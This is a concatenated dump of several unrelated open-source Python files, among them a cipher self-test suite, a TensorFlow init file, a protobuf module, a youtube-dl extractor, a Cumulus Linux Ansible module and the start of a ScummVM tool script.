c=obj.encrypt(text)
if (obj.decrypt(c)!=text): die('Error encrypting "'+text+'"')
text='NotTodayNotEver!'[0:ciph.block_size]
c=obj.encrypt(text)
if (obj.decrypt(c)!=text): die('Error encrypting "'+text+'"')
start=time.time()
s=obj.encrypt(str)
s2=obj.decrypt(s)
end=time.time()
if (str!=s2):
die('Error in resulting plaintext from ECB mode')
print_timing(256, end-start, verbose)
del obj
if verbose: print ' CFB mode:',
obj1=ciph.new(password, ciph.MODE_CFB, IV)
obj2=ciph.new(password, ciph.MODE_CFB, IV)
start=time.time()
ciphertext=obj1.encrypt(str[0:65536])
plaintext=obj2.decrypt(ciphertext)
end=time.time()
if (plaintext!=str[0:65536]):
die('Error in resulting plaintext from CFB mode')
print_timing(64, end-start, verbose)
del obj1, obj2
if verbose: print ' CBC mode:',
obj1=ciph.new(password, ciph.MODE_CBC, IV)
obj2=ciph.new(password, ciph.MODE_CBC, IV)
start=time.time()
ciphertext=obj1.encrypt(str)
plaintext=obj2.decrypt(ciphertext)
end=time.time()
if (plaintext!=str):
die('Error in resulting plaintext from CBC mode')
print_timing(256, end-start, verbose)
del obj1, obj2
if verbose: print ' PGP mode:',
obj1=ciph.new(password, ciph.MODE_PGP, IV)
obj2=ciph.new(password, ciph.MODE_PGP, IV)
start=time.time()
ciphertext=obj1.encrypt(str)
plaintext=obj2.decrypt(ciphertext)
end=time.time()
if (plaintext!=str):
die('Error in resulting plaintext from PGP mode')
print_timing(256, end-start, verbose)
del obj1, obj2
if verbose: print ' OFB mode:',
obj1=ciph.new(password, ciph.MODE_OFB, IV)
obj2=ciph.new(password, ciph.MODE_OFB, IV)
start=time.time()
ciphertext=obj1.encrypt(str)
plaintext=obj2.decrypt(ciphertext)
end=time.time()
if (plaintext!=str):
die('Error in resulting plaintext from OFB mode')
print_timing(256, end-start, verbose)
del obj1, obj2
def counter(length=ciph.block_size):
return length * 'a'
if verbose: print ' CTR mode:',
obj1=ciph.new(password, ciph.MODE_CTR, counter=counter)
obj2=ciph.new(password, ciph.MODE_CTR, counter=counter)
start=time.time()
ciphertext=obj1.encrypt(str)
plaintext=obj2.decrypt(ciphertext)
end=time.time()
if (plaintext!=str):
die('Error in resulting plaintext from CTR mode')
print_timing(256, end-start, verbose)
del obj1, obj2
# Test the IV handling
if verbose: print ' Testing IV handling'
obj1=ciph.new(password, ciph.MODE_CBC, IV)
plaintext='Test'*(ciph.block_size/4)*3
ciphertext1=obj1.encrypt(plaintext)
obj1.IV=IV
ciphertext2=obj1.encrypt(plaintext)
if ciphertext1!=ciphertext2:
die('Error in setting IV')
# Test keyword arguments
obj1=ciph.new(key=password)
obj1=ciph.new(password, mode=ciph.MODE_CBC)
obj1=ciph.new(mode=ciph.MODE_CBC, key=password)
obj1=ciph.new(IV=IV, mode=ciph.MODE_CBC, key=password)
return ciph
def exerciseStreamCipher(cipher, verbose):
import string, time
try:
ciph = eval(cipher)
except (NameError):
print cipher, 'module not available'
return None
print cipher + ':',
str='1' # Build 128K of test data
for i in xrange(0, 17):
str=str+str
key_size = ciph.key_size or 16
password = 'password12345678Extra text for password'[0:key_size]
obj1=ciph.new(password)
obj2=ciph.new(password)
if obj1.block_size != ciph.block_size:
die("Module and cipher object block_size don't match")
if obj1.key_size != ciph.key_size:
die("Module and cipher object key_size don't match")
text='1234567812345678Python'
c=obj1.encrypt(text)
if (obj2.decrypt(c)!=text): die('Error encrypting "'+text+'"')
text='B1FF I2 A R3A11Y |<00L D00D!!!!!'
c=obj1.encrypt(text)
if (obj2.decrypt(c)!=text): die('Error encrypting "'+text+'"')
text='SpamSpamSpamSpamSpamSpamSpamSpamSpam'
c=obj1.encrypt(text)
if (obj2.decrypt(c)!=text): die('Error encrypting "'+text+'"')
start=time.time()
s=obj1.encrypt(str)
str=obj2.decrypt(s)
end=time.time()
print_timing(256, end-start, verbose)
del obj1, obj2
return ciph
def TestStreamModules(args=['arc4', 'XOR'], verbose=1):
import sys, string
args=map(string.lower, args)
if 'arc4' in args:
# Test ARC4 stream cipher
arc4=exerciseStreamCipher('ARC4', verbose)
if (arc4!=None):
for entry in testdata.arc4:
key,plain,cipher=entry
key=binascii.a2b_hex(key)
plain=binascii.a2b_hex(plain)
cipher=binascii.a2b_hex(cipher)
obj=arc4.new(key)
ciphertext=obj.encrypt(plain)
if (ciphertext!=cipher):
die('ARC4 failed on entry '+`entry`)
if 'xor' in args:
# Test XOR stream cipher
XOR=exerciseStreamCipher('XOR', verbose)
if (XOR!=None):
for entry in testdata.xor:
key,plain,cipher=entry
key=binascii.a2b_hex(key)
plain=binascii.a2b_hex(plain)
cipher=binascii.a2b_hex(cipher)
obj=XOR.new(key)
ciphertext=obj.encrypt(plain)
if (ciphertext!=cipher):
die('XOR failed on entry '+`entry`)
def TestBlockModules(args=['aes', 'arc2', 'des', 'blowfish', 'cast', 'des3',
'idea', 'rc5'],
verbose=1):
import string
args=map(string.lower, args)
if 'aes' in args:
ciph=exerciseBlockCipher('AES', verbose) # AES
if (ciph!=None):
if verbose: print ' Verifying against test suite...'
for entry in testdata.aes:
key,plain,cipher=entry
key=binascii.a2b_hex(key)
plain=binascii.a2b_hex(plain)
cipher=binascii.a2b_hex(cipher)
obj=ciph.new(key, ciph.MODE_ECB)
ciphertext=obj.encrypt(plain)
if (ciphertext!=cipher):
die('AES failed on entry '+`entry`)
for i in ciphertext:
if verbose: print hex(ord(i)),
if verbose: print
for entry in testdata.aes_modes:
mode, key, plain, cipher, kw = entry
key=binascii.a2b_hex(key)
plain=binascii.a2b_hex(plain)
cipher=binascii.a2b_hex(cipher)
obj=ciph.new(key, mode, **kw)
obj2=ciph.new(key, mode, **kw)
ciphertext=obj.encrypt(plain)
if (ciphertext!=cipher):
die('AES encrypt failed on entry '+`entry`)
for i in ciphertext:
if verbose: print hex(ord(i)),
if verbose: print
plain2=obj2.decrypt(ciphertext)
if plain2!=plain:
die('AES decrypt failed on entry '+`entry`)
for i in plain2:
if verbose: print hex(ord(i)),
if verbose: print
if 'arc2' in args:
ciph=exerciseBlockCipher('ARC2', verbose) # Alleged RC2
if (ciph!=None):
if verbose: print ' Verifying against test suite...'
for entry in testdata.arc2:
key,plain,cipher=entry
key=binascii.a2b_hex(key)
plain=binascii.a2b_hex(plain)
cipher=binascii.a2b_hex(cipher)
obj=ciph.new(key, ciph.MODE_ECB)
ciphertext=obj.encrypt(plain)
if (ciphertext!=cipher):
die('ARC2 failed on entry '+`entry`)
for i in ciphertext:
if verbose: print hex(ord(i)),
print
if 'blowfish' in args:
ciph=exerciseBlockCipher('Blowfish',verbose)# Bruce Schneier's Blowfish cipher
if (ciph!=None):
if verbose: print ' Verifying against test suite...'
for entry in testdata.blowfish:
key,plain,cipher=entry
key=binascii.a2b_hex(key)
plain=binascii.a2b_hex(plain)
cipher=binascii.a2b_hex(cipher)
obj=ciph.new(key, ciph.MODE_ECB)
ciphertext=obj.encrypt(plain)
if (ciphertext!=cipher):
die('Blowfish failed on entry '+`entry`)
for i in ciphertext:
if verbose: print hex(ord(i)),
if verbose: print
if 'cast' in args:
ciph=exerciseBlockCipher('CAST', verbose) # CAST-128
if (ciph!=None):
if verbose: print ' Verifying against test suite...'
for entry in testdata.cast:
key,plain,cipher=entry
key=binascii.a2b_hex(key)
plain=binascii.a2b_hex(plain)
cipher=binascii.a2b_hex(cipher)
obj=ciph.new(key, ciph.MODE_ECB)
ciphertext=obj.encrypt(plain)
if (ciphertext!=cipher):
die('CAST failed on entry '+`entry`)
for i in ciphertext:
if verbose: print hex(ord(i)),
if verbose: print
if 0:
# The full-maintenance test; it requires 4 million encryptions,
# and correspondingly is quite time-consuming. I've disabled
# it; it's faster to compile block/cast.c with -DTEST and run
# the resulting program.
a = b = '\x01\x23\x45\x67\x12\x34\x56\x78\x23\x45\x67\x89\x34\x56\x78\x9A'
for i in range(0, 1000000):
obj = cast.new(b, cast.MODE_ECB)
a = obj.encrypt(a[:8]) + obj.encrypt(a[-8:])
obj = cast.new(a, cast.MODE_ECB)
b = obj.encrypt(b[:8]) + obj.encrypt(b[-8:])
if a!="\xEE\xA9\xD0\xA2\x49\xFD\x3B\xA6\xB3\x43\x6F\xB8\x9D\x6D\xCA\x92":
if verbose: print 'CAST test failed: value of "a" doesn\'t match'
if b!="\xB2\xC9\x5E\xB0\x0C\x31\xAD\x71\x80\xAC\x05\xB8\xE8\x3D\x69\x6E":
if verbose: print 'CAST test failed: value of "b" doesn\'t match'
if 'des' in args:
# Test/benchmark DES block cipher
des=exerciseBlockCipher('DES', verbose)
if (des!=None):
# Various tests taken from the DES library packaged with Kerberos V4
obj=des.new(binascii.a2b_hex('0123456789abcdef'), des.MODE_ECB)
s=obj.encrypt('Now is t')
if (s!=binascii.a2b_hex('3fa40e8a984d4815')):
die('DES fails test 1')
obj=des.new(binascii.a2b_hex('08192a3b4c5d6e7f'), des.MODE_ECB)
s=obj.encrypt('\000\000\000\000\000\000\000\000')
if (s!=binascii.a2b_hex('25ddac3e96176467')):
die('DES fails test 2')
obj=des.new(binascii.a2b_hex('0123456789abcdef'), des.MODE_CBC,
binascii.a2b_hex('1234567890abcdef'))
s=obj.encrypt("Now is the time for all ")
if (s!=binascii.a2b_hex('e5c7cdde872bf27c43e934008c389c0f683788499a7c05f6')):
die('DES fails test 3')
obj=des.new(binascii.a2b_hex('0123456789abcdef'), des.MODE_CBC,
binascii.a2b_hex('fedcba9876543210'))
s=obj.encrypt("7654321 Now is the time for \000\000\000\000")
if (s!=binascii.a2b_hex("ccd173ffab2039f4acd8aefddfd8a1eb468e91157888ba681d269397f7fe62b4")):
die('DES fails test 4')
del obj,s
# R. Rivest's test: see http://theory.lcs.mit.edu/~rivest/destest.txt
x=binascii.a2b_hex('9474B8E8C73BCA7D')
for i in range(0, 16):
obj=des.new(x, des.MODE_ECB)
if (i & 1): x=obj.decrypt(x)
else: x=obj.encrypt(x)
if x!=binascii.a2b_hex('1B1A2DDB4C642438'):
die("DES fails Rivest's test")
if verbose: print ' Verifying against test suite...'
for entry in testdata.des:
key,plain,cipher=entry
key=binascii.a2b_hex(key)
plain=binascii.a2b_hex(plain)
cipher=binascii.a2b_hex(cipher)
obj=des.new(key, des.MODE_ECB)
ciphertext=obj.encrypt(plain)
if (ciphertext!=cipher):
die('DES failed on entry '+`entry`)
for entry in testdata.des_cbc:
key, iv, plain, cipher=entry
key, iv, cipher=binascii.a2b_hex(key),binascii.a2b_hex(iv),binascii.a2b_hex(cipher)
obj1=des.new(key, des.MODE_CBC, iv)
obj2=des.new(key, des.MODE_CBC, iv)
ciphertext=obj1.encrypt(plain)
if (ciphertext!=cipher):
die('DES CBC mode failed on entry '+`entry`)
if 'des3' in args:
ciph=exerciseBlockCipher('DES3', verbose) # Triple DES
if (ciph!=None):
if verbose: print ' Verifying against test suite...'
for entry in testdata.des3:
key,plain,cipher=entry
key=binascii.a2b_hex(key)
plain=binascii.a2b_hex(plain)
cipher=binascii.a2b_hex(cipher)
obj=ciph.new(key, ciph.MODE_ECB)
ciphertext=obj.encrypt(plain)
if (ciphertext!=cipher):
die('DES3 failed on entry '+`entry`)
for i in ciphertext:
if verbose: print hex(ord(i)),
if verbose: print
for entry in testdata.des3_cbc:
key, iv, plain, cipher=entry
key, iv, cipher=binascii.a2b_hex(key),binascii.a2b_hex(iv),binascii.a2b_hex(cipher)
obj1=ciph.new(key, ciph.MODE_CBC, iv)
obj2=ciph.new(key, ciph.MODE_CBC, iv)
ciphertext=obj1.encrypt(plain)
if (ciphertext!=cipher):
die('DES3 CBC mode failed on entry '+`entry`)
if 'idea' in args:
ciph=exerciseBlockCipher('IDEA', verbose) # IDEA block cipher
if (ciph!=None):
if verbose: print ' Verifying against test suite...'
for entry in testdata.idea:
key,plain,cipher=entry
key=binascii.a2b_hex(key)
plain=binascii.a2b_hex(plain)
cipher=binascii.a2b_hex(cipher)
obj=ciph.new(key, ciph.MODE_ECB)
ciphertext=obj.encrypt(plain)
if (ciphertext!=cipher):
die('IDEA failed on entry '+`entry`)
if 'rc5' in args:
# Ronald Rivest's RC5 algorithm
ciph=exerciseBlockCipher('RC5', verbose)
if (ciph!=None):
if verbose: print ' Verifying against test suite...'
for entry in testdata.rc5:
key,plain,cipher=entry
key=binascii.a2b_hex(key)
plain=binascii.a2b_hex(plain)
cipher=binascii.a2b_hex(cipher)
obj=ciph.new(key[4:], ciph.MODE_ECB,
version =ord(key[0]),
word_size=ord(key[1]),
rounds =ord(key[2]) )
ciphertext=obj.encrypt(plain)
if (ciphertext!=cipher):
die('RC5 failed on entry '+`entry`)
for i in ciphertext:
if verbose: print hex(ord(i)),
if verbose: print
| apache-2.0 |
lukeiwanski/tensorflow | tensorflow/contrib/feature_column/__init__.py | 42 | 1502 | # Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Experimental utilities for tf.feature_column."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# pylint: disable=unused-import,line-too-long,wildcard-import
from tensorflow.contrib.feature_column.python.feature_column.sequence_feature_column import *
from tensorflow.python.util.all_util import remove_undocumented
# pylint: enable=unused-import,line-too-long,wildcard-import
_allowed_symbols = [
'sequence_categorical_column_with_hash_bucket',
'sequence_categorical_column_with_identity',
'sequence_categorical_column_with_vocabulary_list',
'sequence_categorical_column_with_vocabulary_file',
'sequence_input_layer',
'sequence_numeric_column',
]
remove_undocumented(__name__, allowed_exception_list=_allowed_symbols)
| apache-2.0 |
PokeHunterProject/pogom-updated | pogom/pgoapi/protos/POGOProtos/Map/Fort/FortRenderingType_pb2.py | 16 | 1781 | # Generated by the protocol buffer compiler. DO NOT EDIT!
# source: POGOProtos/Map/Fort/FortRenderingType.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf.internal import enum_type_wrapper
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name='POGOProtos/Map/Fort/FortRenderingType.proto',
package='POGOProtos.Map.Fort',
syntax='proto3',
serialized_pb=_b('\n+POGOProtos/Map/Fort/FortRenderingType.proto\x12\x13POGOProtos.Map.Fort*3\n\x11\x46ortRenderingType\x12\x0b\n\x07\x44\x45\x46\x41ULT\x10\x00\x12\x11\n\rINTERNAL_TEST\x10\x01\x62\x06proto3')
)
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
_FORTRENDERINGTYPE = _descriptor.EnumDescriptor(
name='FortRenderingType',
full_name='POGOProtos.Map.Fort.FortRenderingType',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='DEFAULT', index=0, number=0,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='INTERNAL_TEST', index=1, number=1,
options=None,
type=None),
],
containing_type=None,
options=None,
serialized_start=68,
serialized_end=119,
)
_sym_db.RegisterEnumDescriptor(_FORTRENDERINGTYPE)
FortRenderingType = enum_type_wrapper.EnumTypeWrapper(_FORTRENDERINGTYPE)
DEFAULT = 0
INTERNAL_TEST = 1
DESCRIPTOR.enum_types_by_name['FortRenderingType'] = _FORTRENDERINGTYPE
# @@protoc_insertion_point(module_scope)
| mit |
durai145/youtube-dl | youtube_dl/extractor/myvideo.py | 87 | 6273 | from __future__ import unicode_literals
import binascii
import base64
import hashlib
import re
import json
from .common import InfoExtractor
from ..compat import (
compat_ord,
compat_urllib_parse,
compat_urllib_parse_unquote,
compat_urllib_request,
)
from ..utils import (
ExtractorError,
)
class MyVideoIE(InfoExtractor):
_VALID_URL = r'http://(?:www\.)?myvideo\.de/(?:[^/]+/)?watch/(?P<id>[0-9]+)/[^?/]+.*'
IE_NAME = 'myvideo'
_TEST = {
'url': 'http://www.myvideo.de/watch/8229274/bowling_fail_or_win',
'md5': '2d2753e8130479ba2cb7e0a37002053e',
'info_dict': {
'id': '8229274',
'ext': 'flv',
'title': 'bowling-fail-or-win',
}
}
# Original Code from: https://github.com/dersphere/plugin.video.myvideo_de.git
# Released into the Public Domain by Tristan Fischer on 2013-05-19
# https://github.com/rg3/youtube-dl/pull/842
def __rc4crypt(self, data, key):
x = 0
box = list(range(256))
for i in list(range(256)):
x = (x + box[i] + compat_ord(key[i % len(key)])) % 256
box[i], box[x] = box[x], box[i]
x = 0
y = 0
out = ''
for char in data:
x = (x + 1) % 256
y = (y + box[x]) % 256
box[x], box[y] = box[y], box[x]
out += chr(compat_ord(char) ^ box[(box[x] + box[y]) % 256])
return out
def __md5(self, s):
return hashlib.md5(s).hexdigest().encode()
def _real_extract(self, url):
mobj = re.match(self._VALID_URL, url)
video_id = mobj.group('id')
GK = (
b'WXpnME1EZGhNRGhpTTJNM01XVmhOREU0WldNNVpHTTJOakpt'
b'TW1FMU5tVTBNR05pWkRaa05XRXhNVFJoWVRVd1ptSXhaVEV3'
b'TnpsbA0KTVRkbU1tSTRNdz09'
)
# Get video webpage
webpage_url = 'http://www.myvideo.de/watch/%s' % video_id
webpage = self._download_webpage(webpage_url, video_id)
mobj = re.search('source src=\'(.+?)[.]([^.]+)\'', webpage)
if mobj is not None:
self.report_extraction(video_id)
video_url = mobj.group(1) + '.flv'
video_title = self._html_search_regex('<title>([^<]+)</title>',
webpage, 'title')
return {
'id': video_id,
'url': video_url,
'title': video_title,
}
mobj = re.search(r'data-video-service="/service/data/video/%s/config' % video_id, webpage)
if mobj is not None:
request = compat_urllib_request.Request('http://www.myvideo.de/service/data/video/%s/config' % video_id, '')
response = self._download_webpage(request, video_id,
'Downloading video info')
info = json.loads(base64.b64decode(response).decode('utf-8'))
return {
'id': video_id,
'title': info['title'],
'url': info['streaming_url'].replace('rtmpe', 'rtmpt'),
'play_path': info['filename'],
'ext': 'flv',
'thumbnail': info['thumbnail'][0]['url'],
}
# try encxml
mobj = re.search('var flashvars={(.+?)}', webpage)
if mobj is None:
raise ExtractorError('Unable to extract video')
params = {}
encxml = ''
sec = mobj.group(1)
for (a, b) in re.findall('(.+?):\'(.+?)\',?', sec):
if not a == '_encxml':
params[a] = b
else:
encxml = compat_urllib_parse_unquote(b)
if not params.get('domain'):
params['domain'] = 'www.myvideo.de'
xmldata_url = '%s?%s' % (encxml, compat_urllib_parse.urlencode(params))
if 'flash_playertype=MTV' in xmldata_url:
self._downloader.report_warning('avoiding MTV player')
xmldata_url = (
'http://www.myvideo.de/dynamic/get_player_video_xml.php'
'?flash_playertype=D&ID=%s&_countlimit=4&autorun=yes'
) % video_id
# get enc data
enc_data = self._download_webpage(xmldata_url, video_id).split('=')[1]
enc_data_b = binascii.unhexlify(enc_data)
sk = self.__md5(
base64.b64decode(base64.b64decode(GK)) +
self.__md5(
str(video_id).encode('utf-8')
)
)
dec_data = self.__rc4crypt(enc_data_b, sk)
# extracting infos
self.report_extraction(video_id)
video_url = None
mobj = re.search('connectionurl=\'(.*?)\'', dec_data)
if mobj:
video_url = compat_urllib_parse_unquote(mobj.group(1))
if 'myvideo2flash' in video_url:
self.report_warning(
'Rewriting URL to use unencrypted rtmp:// ...',
video_id)
video_url = video_url.replace('rtmpe://', 'rtmp://')
if not video_url:
# extract non rtmp videos
mobj = re.search('path=\'(http.*?)\' source=\'(.*?)\'', dec_data)
if mobj is None:
raise ExtractorError('unable to extract url')
video_url = compat_urllib_parse_unquote(mobj.group(1)) + compat_urllib_parse_unquote(mobj.group(2))
video_file = self._search_regex('source=\'(.*?)\'', dec_data, 'video file')
video_file = compat_urllib_parse_unquote(video_file)
if not video_file.endswith('f4m'):
ppath, prefix = video_file.split('.')
video_playpath = '%s:%s' % (prefix, ppath)
else:
video_playpath = ''
video_swfobj = self._search_regex('swfobject.embedSWF\(\'(.+?)\'', webpage, 'swfobj')
video_swfobj = compat_urllib_parse_unquote(video_swfobj)
video_title = self._html_search_regex("<h1(?: class='globalHd')?>(.*?)</h1>",
webpage, 'title')
return {
'id': video_id,
'url': video_url,
'tc_url': video_url,
'title': video_title,
'ext': 'flv',
'play_path': video_playpath,
'player_url': video_swfobj,
}
| unlicense |
nwiizo/workspace_2017 | ansible-modules-core/network/cumulus/cl_img_install.py | 12 | 10956 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2016, Cumulus Networks <[email protected]>
#
# This file is part of Ansible
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
ANSIBLE_METADATA = {'status': ['preview'],
'supported_by': 'community',
'version': '1.0'}
DOCUMENTATION = '''
---
module: cl_img_install
version_added: "2.1"
author: "Cumulus Networks (@CumulusLinux)"
short_description: Install a different Cumulus Linux version.
description:
- install a different version of Cumulus Linux in the inactive slot. For
more details go the Image Management User Guide at
U(http://docs.cumulusnetworks.com/).
options:
src:
description:
- The full path to the Cumulus Linux binary image. Can be a local path,
http or https URL. If the code version is in the name of the file,
the module will assume this is the version of code you wish to
install.
required: true
version:
description:
- Inform the module of the exact version one is installing. This
overrides the automatic check of version in the file name. For
example, if the binary file name is called CumulusLinux-2.2.3.bin,
and version is set to '2.5.0', then the module will assume it is
installing '2.5.0' not '2.2.3'. If version is not included, then
the module will assume '2.2.3' is the version to install.
default: None
required: false
switch_slot:
description:
- Switch slots after installing the image.
To run the installed code, reboot the switch.
choices: ['yes', 'no']
default: 'no'
required: false
requirements: ["Cumulus Linux OS"]
'''
EXAMPLES = '''
Example playbook entries using the cl_img_install module
## Download and install the image from a webserver.
- name: Install image using using http url. Switch slots so the subsequent will load the new version
cl_img_install:
version: 2.0.1
src: http://10.1.1.1/CumulusLinux-2.0.1.bin
switch_slot: yes
## Copy the software from the ansible server to the switch.
## The module will get the code version from the filename
## The code will be installed in the alternate slot but the slot will not be primary
## A subsequent reload will not run the new code
- name: Download cumulus linux to local system
get_url:
src: ftp://cumuluslinux.bin
dest: /root/CumulusLinux-2.0.1.bin
- name: Install image from local filesystem. Get version from the filename.
cl_img_install:
src: /root/CumulusLinux-2.0.1.bin
## If the image name has been changed from the original name, use the `version` option
## to inform the module exactly what code version is been installed
- name: Download cumulus linux to local system
get_url:
src: ftp://CumulusLinux-2.0.1.bin
dest: /root/image.bin
- name: install image and switch slots. only reboot needed
cl_img_install:
version: 2.0.1
src: /root/image.bin
switch_slot: yes
'''
RETURN = '''
changed:
description: whether the interface was changed
returned: changed
type: bool
sample: True
msg:
description: human-readable report of success or failure
returned: always
type: string
sample: "interface bond0 config updated"
'''
def check_url(module, url):
parsed_url = urlparse(url)
if len(parsed_url.path) > 0:
sch = parsed_url.scheme
if (sch == 'http' or sch == 'https' or len(parsed_url.scheme) == 0):
return True
module.fail_json(msg="Image Path URL. Wrong Format %s" % (url))
return False
def run_cl_cmd(module, cmd, check_rc=True):
try:
(rc, out, err) = module.run_command(cmd, check_rc=check_rc)
except Exception:
e = get_exception()
module.fail_json(msg=e.strerror)
# trim last line as it is always empty
ret = out.splitlines()
return ret
def get_slot_info(module):
slots = {}
slots['1'] = {}
slots['2'] = {}
active_slotnum = get_active_slot(module)
primary_slotnum = get_primary_slot_num(module)
for _num in range(1, 3):
slot = slots[str(_num)]
slot['version'] = get_slot_version(module, str(_num))
if _num == int(active_slotnum):
slot['active'] = True
if _num == int(primary_slotnum):
slot['primary'] = True
return slots
def get_slot_version(module, slot_num):
lsb_release = check_mnt_root_lsb_release(slot_num)
switch_firm_ver = check_fw_print_env(module, slot_num)
_version = module.sw_version
if lsb_release == _version or switch_firm_ver == _version:
return _version
elif lsb_release:
return lsb_release
else:
return switch_firm_ver
def check_mnt_root_lsb_release(slot_num):
_path = '/mnt/root-rw/config%s/etc/lsb-release' % (slot_num)
try:
lsb_release = open(_path)
lines = lsb_release.readlines()
for line in lines:
_match = re.search('DISTRIB_RELEASE=([0-9a-zA-Z.]+)', line)
if _match:
return _match.group(1).split('-')[0]
except:
pass
return None
def check_fw_print_env(module, slot_num):
cmd = None
if platform.machine() == 'ppc':
cmd = "/usr/sbin/fw_printenv -n cl.ver%s" % (slot_num)
fw_output = run_cl_cmd(module, cmd)
return fw_output[0].split('-')[0]
elif platform.machine() == 'x86_64':
cmd = "/usr/bin/grub-editenv list"
grub_output = run_cl_cmd(module, cmd)
for _line in grub_output:
_regex_str = re.compile('cl.ver' + slot_num + '=([\w.]+)-')
m0 = re.match(_regex_str, _line)
if m0:
return m0.group(1)
def get_primary_slot_num(module):
cmd = None
if platform.machine() == 'ppc':
cmd = "/usr/sbin/fw_printenv -n cl.active"
return ''.join(run_cl_cmd(module, cmd))
elif platform.machine() == 'x86_64':
cmd = "/usr/bin/grub-editenv list"
grub_output = run_cl_cmd(module, cmd)
for _line in grub_output:
_regex_str = re.compile('cl.active=(\d)')
m0 = re.match(_regex_str, _line)
if m0:
return m0.group(1)
def get_active_slot(module):
try:
cmdline = open('/proc/cmdline').readline()
except:
module.fail_json(msg='Failed to open /proc/cmdline. ' +
'Unable to determine active slot')
_match = re.search('active=(\d+)', cmdline)
if _match:
return _match.group(1)
return None
def install_img(module):
src = module.params.get('src')
_version = module.sw_version
app_path = '/usr/cumulus/bin/cl-img-install -f %s' % (src)
run_cl_cmd(module, app_path)
perform_switch_slot = module.params.get('switch_slot')
if perform_switch_slot is True:
check_sw_version(module)
else:
_changed = True
_msg = "Cumulus Linux Version " + _version + " successfully" + \
" installed in alternate slot"
module.exit_json(changed=_changed, msg=_msg)
def switch_slot(module, slotnum):
_switch_slot = module.params.get('switch_slot')
if _switch_slot is True:
app_path = '/usr/cumulus/bin/cl-img-select %s' % (slotnum)
run_cl_cmd(module, app_path)
def determine_sw_version(module):
_version = module.params.get('version')
_filename = ''
# Use _version if user defines it
if _version:
module.sw_version = _version
return
else:
_filename = module.params.get('src').split('/')[-1]
_match = re.search('\d+\W\d+\W\w+', _filename)
if _match:
module.sw_version = re.sub('\W', '.', _match.group())
return
_msg = 'Unable to determine version from file %s' % (_filename)
module.exit_json(changed=False, msg=_msg)
def check_sw_version(module):
slots = get_slot_info(module)
_version = module.sw_version
perform_switch_slot = module.params.get('switch_slot')
for _num, slot in slots.items():
if slot['version'] == _version:
if 'active' in slot:
_msg = "Version %s is installed in the active slot" \
% (_version)
module.exit_json(changed=False, msg=_msg)
else:
_msg = "Version " + _version + \
" is installed in the alternate slot. "
if 'primary' not in slot:
if perform_switch_slot is True:
switch_slot(module, _num)
_msg = _msg + \
"cl-img-select has made the alternate " + \
"slot the primary slot. " +\
"Next reboot, switch will load " + _version + "."
module.exit_json(changed=True, msg=_msg)
else:
_msg = _msg + \
"Next reboot will not load " + _version + ". " + \
"switch_slot keyword set to 'no'."
module.exit_json(changed=False, msg=_msg)
else:
if perform_switch_slot is True:
_msg = _msg + \
"Next reboot, switch will load " + _version + "."
module.exit_json(changed=False, msg=_msg)
else:
_msg = _msg + \
'switch_slot set to "no". ' + \
'No further action to take'
module.exit_json(changed=False, msg=_msg)
def main():
module = AnsibleModule(
argument_spec=dict(
src=dict(required=True, type='str'),
version=dict(type='str'),
switch_slot=dict(type='bool', choices=BOOLEANS, default=False),
),
)
determine_sw_version(module)
_url = module.params.get('src')
check_sw_version(module)
check_url(module, _url)
install_img(module)
# import module snippets
from ansible.module_utils.basic import *
# incompatible with ansible 1.4.4 - ubuntu 12.04 version
# from ansible.module_utils.urls import *
from urlparse import urlparse
import re
if __name__ == '__main__':
main()
| mit |
nemomobile-apps/scummvm | devtools/tasmrecover/tasm/cpp.py | 26 | 20440 | # ScummVM - Graphic Adventure Engine
#
# ScummVM is the legal property of its developers, whose names
# are too numerous to list here. Please refer to the COPYRIGHT
# file distributed with this source distribution.
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
import op, traceback, re, proc
from copy import copy
proc_module = proc
class CrossJump(Exception):
pass
def parse_bin(s):
b = s.group(1)
v = hex(int(b, 2))
#print "BINARY: %s -> %s" %(b, v)
return v
class cpp:
def __init__(self, context, namespace, skip_first = 0, blacklist = [], skip_output = [], skip_dispatch_call = False, skip_addr_constants = False, header_omit_blacklisted = False, function_name_remapping = { }):
self.namespace = namespace
fname = namespace.lower() + ".cpp"
header = namespace.lower() + ".h"
banner = """/* PLEASE DO NOT MODIFY THIS FILE. ALL CHANGES WILL BE LOST! LOOK FOR README FOR DETAILS */
/* ScummVM - Graphic Adventure Engine
*
* ScummVM is the legal property of its developers, whose names
* are too numerous to list here. Please refer to the COPYRIGHT
* file distributed with this source distribution.
*
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public License
* as published by the Free Software Foundation; either version 2
